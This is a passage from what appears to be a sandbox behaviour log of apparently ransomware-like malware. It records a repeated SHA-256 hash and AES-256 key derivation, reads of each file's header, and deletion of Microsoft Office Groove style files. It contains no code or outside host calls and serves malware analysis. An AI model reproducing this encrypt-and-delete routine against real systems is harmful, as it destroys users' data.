RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0166.622] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0166.622] CryptHashData (hHash=0x284d668, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.622] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0166.622] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd5b [0166.623] ReadFile (in: hFile=0x4e4, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0166.638] CryptDestroyHash (hHash=0x284d668) returned 1 [0166.638] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0166.638] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.639] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightOrange.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\brightorange.css")) returned 1 [0166.640] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0166.640] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0166.641] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0166.641] CryptHashData (hHash=0x284d6e8, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.641] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6e8, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0166.641] GetFileSize (in: hFile=0x504, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xcb6 [0166.641] ReadFile (in: hFile=0x504, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0166.659] CryptDestroyHash (hHash=0x284d6e8) returned 1 [0166.659] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0166.659] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.660] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightYellow.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\brightyellow.css")) returned 1 [0166.669] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0166.670] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0166.670] CryptHashData (hHash=0x284d668, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.670] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0166.670] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3a2 [0166.670] ReadFile (in: hFile=0x4e4, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0166.776] CryptDestroyHash (hHash=0x284d668) returned 1 [0166.776] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0166.776] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.778] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Casual.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\casual.css")) returned 1 [0166.779] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0166.780] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0166.780] CryptHashData (hHash=0x284d6e8, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.780] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6e8, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0166.780] GetFileSize (in: hFile=0x504, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x373 [0166.780] ReadFile (in: hFile=0x504, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0166.808] CryptDestroyHash (hHash=0x284d6e8) returned 1 [0166.808] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0166.808] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.809] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Country.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\country.css")) returned 1 [0166.838] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0166.838] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0166.839] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0166.839] CryptHashData (hHash=0x284d668, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.839] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0166.839] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x977 [0166.839] ReadFile (in: hFile=0x4e4, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0166.841] CryptDestroyHash (hHash=0x284d668) returned 1 [0166.841] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0166.841] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.842] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Desert.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\desert.css")) returned 1 [0166.843] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0166.844] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0166.844] CryptHashData (hHash=0x284d6e8, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.844] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6e8, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0166.844] GetFileSize (in: hFile=0x504, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x370 [0166.844] ReadFile (in: hFile=0x504, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0166.874] CryptDestroyHash (hHash=0x284d6e8) returned 1 [0166.874] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0166.874] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.875] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Earthy.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\earthy.css")) returned 1 [0166.876] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0166.877] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0166.877] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0166.877] CryptHashData (hHash=0x284d668, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.877] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0166.877] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xaf2 [0166.877] ReadFile (in: hFile=0x4e4, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0166.897] CryptDestroyHash (hHash=0x284d668) returned 1 [0166.897] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0166.897] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.898] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\GrayCheck.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\graycheck.css")) returned 1 [0166.900] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0166.900] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0166.900] CryptHashData (hHash=0x284d6e8, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.900] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6e8, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0166.900] GetFileSize (in: hFile=0x504, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3a4 [0166.900] ReadFile (in: hFile=0x504, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0166.917] CryptDestroyHash (hHash=0x284d6e8) returned 1 [0166.917] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0166.917] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.918] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\GreenTea.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\greentea.css")) returned 1 [0166.920] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0166.921] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0166.921] CryptHashData (hHash=0x284d668, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.921] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0166.921] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x411 [0166.921] ReadFile (in: hFile=0x4e4, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0166.950] CryptDestroyHash (hHash=0x284d668) returned 1 [0166.950] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0166.950] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.951] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\LightSpirit.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\lightspirit.css")) returned 1 [0166.954] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0166.955] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0166.955] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0166.955] CryptHashData (hHash=0x284d6e8, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.955] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6e8, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0166.955] GetFileSize (in: hFile=0x504, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xcfb [0166.955] ReadFile (in: hFile=0x504, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0166.978] CryptDestroyHash (hHash=0x284d6e8) returned 1 [0166.978] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0166.979] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.980] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Lime.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\lime.css")) returned 1 [0167.000] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0167.000] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0167.000] CryptHashData (hHash=0x284d668, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.000] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0167.000] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x362 [0167.000] ReadFile (in: hFile=0x4e4, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0167.002] CryptDestroyHash (hHash=0x284d668) returned 1 [0167.002] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0167.002] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.004] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Maroon.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\maroon.css")) returned 1 [0167.005] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0167.005] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0167.006] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0167.006] CryptHashData (hHash=0x284d6e8, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.006] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6e8, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0167.006] GetFileSize (in: hFile=0x504, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbf2 [0167.006] ReadFile (in: hFile=0x504, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0167.009] CryptDestroyHash (hHash=0x284d6e8) returned 1 [0167.009] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0167.009] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.010] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Oasis.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\oasis.css")) returned 1 [0167.011] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0167.012] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0167.012] CryptHashData (hHash=0x284d668, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.012] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0167.012] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x38d [0167.012] ReadFile (in: hFile=0x4e4, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0167.014] CryptDestroyHash (hHash=0x284d668) returned 1 [0167.014] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0167.014] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.016] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\OliveGreen.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\olivegreen.css")) returned 1 [0167.020] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0167.020] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0167.020] CryptHashData (hHash=0x284d6e8, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.020] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6e8, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0167.020] GetFileSize (in: hFile=0x504, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x348 [0167.021] ReadFile (in: hFile=0x504, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0167.064] CryptDestroyHash (hHash=0x284d6e8) returned 1 [0167.064] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0167.064] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.065] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Premium.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\premium.css")) returned 1 [0167.067] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0167.067] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0167.068] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0167.068] CryptHashData (hHash=0x284d668, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.068] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0167.068] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd41 [0167.068] ReadFile (in: hFile=0x4e4, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0167.125] CryptDestroyHash (hHash=0x284d668) returned 1 [0167.125] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0167.125] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.126] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Slate.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\slate.css")) returned 1 [0167.128] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52810) returned 1 [0167.128] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0167.128] CryptHashData (hHash=0x284d6e8, pbData=0x9ed8a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.128] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6e8, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d6a8) returned 1 [0167.128] GetFileSize (in: hFile=0x504, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x38c [0167.128] ReadFile (in: hFile=0x504, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0167.155] CryptDestroyHash (hHash=0x284d6e8) returned 1 [0167.155] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0167.155] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.156] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SlateBlue.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\slateblue.css")) returned 1 [0167.157] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0167.158] CryptAcquireContextW (in: phProv=0x3266e8c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3266e8c*=0xa52810) returned 1 [0167.158] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3266e90 | out: phHash=0x3266e90) returned 1 [0167.158] CryptHashData (hHash=0x284d6a8, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.158] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x3266e84 | out: phKey=0x3266e84*=0x284d6e8) returned 1 [0167.158] GetFileSize (in: hFile=0x504, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1afa [0167.158] ReadFile (in: hFile=0x504, lpBuffer=0x3266f04, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3266e94, lpOverlapped=0x0 | out: lpBuffer=0x3266f04*, lpNumberOfBytesRead=0x3266e94*=0x80, lpOverlapped=0x0) returned 1 [0167.215] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0167.215] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0167.215] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.218] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SoftBlue\\background.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\softblue\\background.gif")) returned 1 [0167.220] CryptAcquireContextW (in: phProv=0x3266e8c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3266e8c*=0xa52810) returned 1 [0167.220] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3266e90 | out: phHash=0x3266e90) returned 1 [0167.220] CryptHashData (hHash=0x284d728, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.220] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x3266e84 | out: phKey=0x3266e84*=0x284d6e8) returned 1 [0167.220] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x155 [0167.220] ReadFile (in: hFile=0x510, lpBuffer=0x3266f04, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3266e94, lpOverlapped=0x0 | out: lpBuffer=0x3266f04*, lpNumberOfBytesRead=0x3266e94*=0x80, lpOverlapped=0x0) returned 1 [0167.222] 